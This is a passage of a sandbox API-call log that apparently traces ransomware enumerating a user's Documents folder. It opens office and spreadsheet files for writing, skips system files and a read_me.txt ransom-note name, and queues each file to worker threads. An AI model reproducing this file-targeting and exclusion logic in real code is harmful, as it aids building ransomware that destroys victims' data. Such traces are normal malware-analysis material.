cAlternateFileName="QWIQKQ~1.DOC")) returned 1 [0076.009] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QwIqKQSVxE 5799zU.docx") returned 67 [0076.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QwIqKQSVxE 5799zU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwiqkqsvxe 5799zu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x864 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="read_me.txt") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="autoexec.bat") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="desktop.ini") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="autorun.inf") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="ntuser.dat") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="iconcache.db") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="bootsect.bak") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="boot.ini") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.009] StrStrW (lpFirst="qwiqkqsvxe 5799zu.docx", lpSrch="thumbs.db") returned 0x0 [0076.009] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 58 [0076.009] QueueUserWorkItem (Function=0x404e00, Context=0x864, Flags=0x0) returned 1 [0076.009] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.009] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt") returned 55 [0076.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0076.010] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.010] CloseHandle (hObject=0x868) returned 1 [0076.010] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50279940, ftCreationTime.dwHighDateTime=0x1d5715c, ftLastAccessTime.dwLowDateTime=0x72f13760, ftLastAccessTime.dwHighDateTime=0x1d55e60, ftLastWriteTime.dwLowDateTime=0x72f13760, ftLastWriteTime.dwHighDateTime=0x1d55e60, nFileSizeHigh=0x0, nFileSizeLow=0xb64d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WQ1kIjdf.docx", cAlternateFileName="WQ1KIJ~1.DOC")) returned 1 [0076.010] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WQ1kIjdf.docx") returned 57 [0076.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WQ1kIjdf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wq1kijdf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="read_me.txt") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="autoexec.bat") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="desktop.ini") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="autorun.inf") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="ntuser.dat") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="iconcache.db") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="bootsect.bak") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="boot.ini") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.010] StrStrW (lpFirst="wq1kijdf.docx", lpSrch="thumbs.db") returned 0x0 [0076.010] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 59 [0076.010] QueueUserWorkItem (Function=0x404e00, Context=0x868, Flags=0x0) returned 1 [0076.010] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78b1e0, ftCreationTime.dwHighDateTime=0x1d57a53, ftLastAccessTime.dwLowDateTime=0x7cbb2410, ftLastAccessTime.dwHighDateTime=0x1d56561, ftLastWriteTime.dwLowDateTime=0x7cbb2410, ftLastWriteTime.dwHighDateTime=0x1d56561, nFileSizeHigh=0x0, nFileSizeLow=0xeb6a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xCG7cBBdA26D4C4a7O.docx", cAlternateFileName="XCG7CB~1.DOC")) returned 1 [0076.010] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xCG7cBBdA26D4C4a7O.docx") returned 67 [0076.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xCG7cBBdA26D4C4a7O.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xcg7cbbda26d4c4a7o.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x86c [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="read_me.txt") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="autoexec.bat") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="desktop.ini") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="autorun.inf") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="ntuser.dat") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="iconcache.db") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="bootsect.bak") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="boot.ini") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.011] StrStrW (lpFirst="xcg7cbbda26d4c4a7o.docx", lpSrch="thumbs.db") returned 0x0 [0076.011] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 60 [0076.011] QueueUserWorkItem (Function=0x404e00, Context=0x86c, Flags=0x0) returned 1 [0076.011] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2f8d20, ftCreationTime.dwHighDateTime=0x1d54339, ftLastAccessTime.dwLowDateTime=0xdc198290, ftLastAccessTime.dwHighDateTime=0x1d55e58, ftLastWriteTime.dwLowDateTime=0xdc198290, ftLastWriteTime.dwHighDateTime=0x1d55e58, nFileSizeHigh=0x0, nFileSizeLow=0xb511, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X_wIoPGx2gE8.xlsx", cAlternateFileName="X_WIOP~1.XLS")) returned 1 [0076.011] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X_wIoPGx2gE8.xlsx") returned 61 [0076.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X_wIoPGx2gE8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x_wiopgx2ge8.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x870 [0076.011] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.011] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.011] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.011] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.011] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.012] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.012] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.012] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="boot.ini") returned 0x0 [0076.012] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.012] StrStrW (lpFirst="x_wiopgx2ge8.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.012] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 61 [0076.012] QueueUserWorkItem (Function=0x404e00, Context=0x870, Flags=0x0) returned 1 [0076.012] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c641b0, ftCreationTime.dwHighDateTime=0x1d52aa1, ftLastAccessTime.dwLowDateTime=0x9f21c790, ftLastAccessTime.dwHighDateTime=0x1d54665, ftLastWriteTime.dwLowDateTime=0x9f21c790, ftLastWriteTime.dwHighDateTime=0x1d54665, nFileSizeHigh=0x0, nFileSizeLow=0x11ed2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z7-C3T grbVW2iC.pptx", cAlternateFileName="Z7-C3T~1.PPT")) returned 1 [0076.012] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z7-C3T grbVW2iC.pptx") returned 64 [0076.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z7-C3T grbVW2iC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z7-c3t grbvw2ic.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x874 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="read_me.txt") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="desktop.ini") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="autorun.inf") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="iconcache.db") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="boot.ini") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.012] StrStrW (lpFirst="z7-c3t grbvw2ic.pptx", lpSrch="thumbs.db") returned 0x0 [0076.012] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 62 [0076.012] QueueUserWorkItem (Function=0x404e00, Context=0x874, Flags=0x0) returned 1 [0076.012] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3779310, ftCreationTime.dwHighDateTime=0x1d518d2, ftLastAccessTime.dwLowDateTime=0x97db3270, ftLastAccessTime.dwHighDateTime=0x1d520fc, ftLastWriteTime.dwLowDateTime=0x97db3270, ftLastWriteTime.dwHighDateTime=0x1d520fc, nFileSizeHigh=0x0, nFileSizeLow=0x4f5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZaYCVmfMWKGans6Q.pptx", cAlternateFileName="ZAYCVM~1.PPT")) returned 1 [0076.012] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZaYCVmfMWKGans6Q.pptx") returned 65 [0076.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZaYCVmfMWKGans6Q.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zaycvmfmwkgans6q.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x878 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="read_me.txt") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="desktop.ini") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="autorun.inf") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="iconcache.db") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="boot.ini") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.013] StrStrW (lpFirst="zaycvmfmwkgans6q.pptx", lpSrch="thumbs.db") returned 0x0 [0076.013] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 63 [0076.013] QueueUserWorkItem (Function=0x404e00, Context=0x878, Flags=0x0) returned 1 [0076.013] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3779310, ftCreationTime.dwHighDateTime=0x1d518d2, ftLastAccessTime.dwLowDateTime=0x97db3270, ftLastAccessTime.dwHighDateTime=0x1d520fc, ftLastWriteTime.dwLowDateTime=0x97db3270, ftLastWriteTime.dwHighDateTime=0x1d520fc, nFileSizeHigh=0x0, nFileSizeLow=0x4f5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaycvmfmwkgans6q.pptx", cAlternateFileName="ZAYCVM~1.PPT")) returned 0 [0076.013] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.013] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt") returned 55 [0076.013] GetProcessHeap () returned 0x4f10000 [0076.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b800c8 | out: hHeap=0x4f10000) returned 1 [0076.013] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 44 [0076.013] GetProcessHeap () returned 0x4f10000 [0076.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b300a0 | out: hHeap=0x4f10000) returned 1 [0076.013] GetProcessHeap () returned 0x4f10000 [0076.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b800c8 [0076.013] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\*") returned 62 [0076.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.014] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\.") returned 62 [0076.014] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.014] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\..") returned 63 [0076.014] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d22c910, ftCreationTime.dwHighDateTime=0x1d4cb02, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-qLf9qdmX0YqXMSteXaW", cAlternateFileName="-QLF9Q~1")) returned 1 [0076.014] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW") returned 81 [0076.014] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c25680, ftCreationTime.dwHighDateTime=0x1d4c544, ftLastAccessTime.dwLowDateTime=0x51c53c0, ftLastAccessTime.dwHighDateTime=0x1d4c5fc, ftLastWriteTime.dwLowDateTime=0x51c53c0, ftLastWriteTime.dwHighDateTime=0x1d4c5fc, nFileSizeHigh=0x0, nFileSizeLow=0x14766, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8x-34OVBDypJWOE.csv", cAlternateFileName="8X-34O~1.CSV")) returned 1 [0076.014] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\8x-34OVBDypJWOE.csv") returned 80 [0076.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\8x-34OVBDypJWOE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\8x-34ovbdypjwoe.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x87c [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="read_me.txt") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="autoexec.bat") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="desktop.ini") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="autorun.inf") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="ntuser.dat") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="iconcache.db") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="bootsect.bak") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="boot.ini") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="ntuser.dat.log") returned 0x0 [0076.014] StrStrW (lpFirst="8x-34ovbdypjwoe.csv", lpSrch="thumbs.db") returned 0x0 [0076.014] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 64 [0076.014] QueueUserWorkItem (Function=0x404e00, Context=0x87c, Flags=0x0) returned 1 [0076.014] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d5f60, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x45c23a30, ftLastAccessTime.dwHighDateTime=0x1d4c9d9, ftLastWriteTime.dwLowDateTime=0x45c23a30, ftLastWriteTime.dwHighDateTime=0x1d4c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x273b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9jf7wCxNUfpySfJ4Jx.ods", cAlternateFileName="9JF7WC~1.ODS")) returned 1 [0076.014] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\9jf7wCxNUfpySfJ4Jx.ods") returned 83 [0076.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\9jf7wCxNUfpySfJ4Jx.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\9jf7wcxnufpysfj4jx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x880 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="read_me.txt") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="autoexec.bat") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="desktop.ini") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="autorun.inf") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="ntuser.dat") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="iconcache.db") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="bootsect.bak") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="boot.ini") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="ntuser.dat.log") returned 0x0 [0076.015] StrStrW (lpFirst="9jf7wcxnufpysfj4jx.ods", lpSrch="thumbs.db") returned 0x0 [0076.015] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 65 [0076.015] QueueUserWorkItem (Function=0x404e00, Context=0x880, Flags=0x0) returned 1 [0076.015] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CXq6NUTJ 99V2-v6", cAlternateFileName="CXQ6NU~1")) returned 1 [0076.015] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6") returned 77 [0076.015] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G_x-eHIang489Wx", cAlternateFileName="G_X-EH~1")) returned 1 [0076.015] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx") returned 76 [0076.015] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l7IEr", cAlternateFileName="")) returned 1 [0076.015] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 